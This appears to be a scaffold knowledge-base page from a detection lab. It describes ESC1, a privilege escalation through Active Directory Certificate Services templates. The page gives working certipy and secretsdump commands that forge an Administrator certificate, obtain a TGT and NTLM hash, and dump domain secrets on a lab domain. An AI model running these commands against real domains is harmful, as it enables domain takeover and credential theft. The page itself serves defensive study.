ESC1 — Certificate Template Privilege Escalation
Status: Scaffold — content in progress
ATT&CK: T1649 — Steal or Forge Authentication Certificates
Platforms: Windows (Active Directory Certificate Services)
Severity: Critical
What It Exploits
An ADCS certificate template is vulnerable to ESC1 when:
- Low-privilege users can enroll (have
Certificate-Enrollmentright on the template) - The template allows the requester to specify a Subject Alternative Name (SAN) in the certificate request
- The template has the Client Authentication EKU (or Any Purpose, or Smart Card Logon)
Condition 2 is the critical one: the requester can specify any UPN (including Administrator@domain) in the SAN, regardless of who they are. The CA issues the certificate for that identity. The certificate can then be used for Kerberos PKINIT to get a TGT as that user.
Attack Flow
# 1. Enumerate vulnerable templates
certipy find -u user@itdr.lab -p 'Password123!' -dc-ip 192.168.56.10 -vulnerable
# 2. Request certificate for Domain Admin
certipy req -u user@itdr.lab -p 'Password123!' -ca ITDR-CA -template VulnerableTemplate \
-upn Administrator@itdr.lab -dc-ip 192.168.56.10
# 3. Authenticate with certificate to get TGT + NTLM hash
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
# Returns: Administrator's NTLM hash + Kerberos TGT
# 4. Use hash for Pass-the-Hash or PtT
secretsdump.py -hashes :NTLMhash 'ITDR/Administrator@dc01.itdr.lab'
CTI Examples
ESC1-class certificate abuse has been reported in post-compromise activity by multiple threat actors. The SpecterOps research (June 2021) codified the vulnerability classes; since then, adoption in red team and threat actor playbooks has been widespread.
Evidence label: Reported | Confidence: Medium | Source reliability: B2
Why It's Critical
- Low-privilege user → Domain Admin in seconds
- Survives password resets: certificate remains valid even if the target's password is changed
- Low detection footprint: looks like a legitimate certificate enrollment
Cross-Links
| Topic | Link |
|---|---|
| ADCS Protocol | adcs |
| Certificate Theft | certificate-theft |
| Detection | detect-certificate-attacks |
| Simulation | certificate-escalation |